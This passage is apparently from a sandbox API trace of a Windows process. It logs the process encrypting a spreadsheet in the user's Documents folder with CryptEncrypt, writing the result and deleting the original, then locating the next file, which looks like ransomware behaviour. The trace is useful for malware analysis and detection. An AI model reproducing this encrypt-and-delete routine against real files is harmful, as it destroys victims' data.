hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0079.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.450] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0079.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0079.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0079.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796d88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0079.450] CryptGetKeyParam (in: hKey=0x41ac740, dwParam=0x7, pbData=0x43e2880, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2880*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0079.454] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.454] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.454] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.454] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.454] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb000, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0079.454] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x12f5a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x12f60) returned 1 [0079.454] CharLowerBuffW (in: lpsz="byte[77665]", cchLength=0xb | out: lpsz="byte[77665]") returned 0xb [0079.458] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.458] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb1f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0079.459] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49d2e40*, pdwDataLen=0x144e538*=0x12f5a, dwBufLen=0x12f60 | out: pbData=0x49d2e40*, pdwDataLen=0x144e538*=0x12f60) returned 1 [0079.459] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.460] WriteFile (in: hFile=0x298, lpBuffer=0x499a008*, nNumberOfBytesToWrite=0x12f60, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x499a008*, lpNumberOfBytesWritten=0x144ef3c*=0x12f60, lpOverlapped=0x0) returned 1 [0079.464] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0079.464] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.465] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0079.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cac88, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0079.465] CryptDestroyKey (hKey=0x41ac740) returned 1 [0079.465] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.465] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.465] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.465] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.465] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.465] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.465] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.465] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.465] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0079.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0079.465] CryptReleaseContext (hProv=0x41a4948, dwFlags=0x0) returned 1 [0079.465] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.466] FreeLibrary (hLibModule=0x756e0000) returned 1 [0079.466] CloseHandle (hObject=0x258) returned 1 [0079.466] CloseHandle (hObject=0x298) returned 1 [0079.488] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\IVMtcxmHJDptt31P9OCD.xls", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\IVMtcxmHJDptt31P9OCD.xls", lpFilePart=0x0) returned 0x39 [0079.488] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\IVMtcxmHJDptt31P9OCD.xls" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\ivmtcxmhjdptt31p9ocd.xls")) returned 0x20 [0079.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0079.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0079.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0079.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0079.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0079.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0079.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0079.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0079.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0079.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0079.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4508 [0079.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0079.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0079.489] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\IVMtcxmHJDptt31P9OCD.xls", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16a31040, ftCreationTime.dwHighDateTime=0x1d5e638, ftLastAccessTime.dwLowDateTime=0xf70ffc60, ftLastAccessTime.dwHighDateTime=0x1d5eebc, ftLastWriteTime.dwLowDateTime=0xf70ffc60, ftLastWriteTime.dwHighDateTime=0x1d5eebc, nFileSizeHigh=0x0, nFileSizeLow=0x12f5a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="IVMtcxmHJDptt31P9OCD.xls", cAlternateFileName="IVMTCX~1.XLS")) returned 0x41ac2c0 [0079.489] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\IVMtcxmHJDptt31P9OCD.xls" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\ivmtcxmhjdptt31p9ocd.xls")) returned 1 [0079.494] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16a31040, ftCreationTime.dwHighDateTime=0x1d5e638, ftLastAccessTime.dwLowDateTime=0xf70ffc60, ftLastAccessTime.dwHighDateTime=0x1d5eebc, ftLastWriteTime.dwLowDateTime=0xf70ffc60, ftLastWriteTime.dwHighDateTime=0x1d5eebc, nFileSizeHigh=0x0, nFileSizeLow=0x12f5a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="IVMtcxmHJDptt31P9OCD.xls", cAlternateFileName="IVMTCX~1.XLS")) returned 0 [0079.494] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0079.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0079.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0079.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0079.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0079.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4a58 | out: hHeap=0x1780000) returned 1 [0079.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0079.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0079.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0079.495] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0079.495] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0079.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0079.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0079.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0079.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0079.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0079.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0079.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0079.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4314d10 | out: hHeap=0x1780000) returned 1 [0079.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0079.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0079.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0079.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0079.495] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0079.495] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0079.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0079.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0079.495] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0079.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0079.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0079.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0079.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0079.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0079.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0079.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0079.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0079.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0079.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0079.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0079.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3a0 [0079.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0079.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0079.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0079.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0079.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0079.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3a0 | out: hHeap=0x1780000) returned 1 [0079.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0079.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0079.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0079.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3e8 [0079.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0079.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0079.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0079.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0079.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0079.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0079.496] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0079.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0079.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0079.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0079.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0079.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0079.497] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0079.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0079.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0079.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0079.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0079.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0079.497] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\IWVSvvMxlOfdD1.ods", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2966e570, ftCreationTime.dwHighDateTime=0x1d5e391, ftLastAccessTime.dwLowDateTime=0xb4e09380, ftLastAccessTime.dwHighDateTime=0x1d5edc3, ftLastWriteTime.dwLowDateTime=0xb4e09380, ftLastWriteTime.dwHighDateTime=0x1d5edc3, nFileSizeHigh=0x0, nFileSizeLow=0x13f79, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="IWVSvvMxlOfdD1.ods", cAlternateFileName="IWVSVV~1.ODS")) returned 0x41ac140 [0079.497] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0079.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0079.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0079.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0079.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0079.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0079.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0079.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d90 [0079.497] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0079.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d90 | out: hHeap=0x1780000) returned 1 [0079.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2440 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0079.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0079.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0079.498] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0079.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0079.498] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0079.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0079.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0079.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2480 [0079.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0079.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0079.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0079.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0079.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0079.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0079.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0079.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0079.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 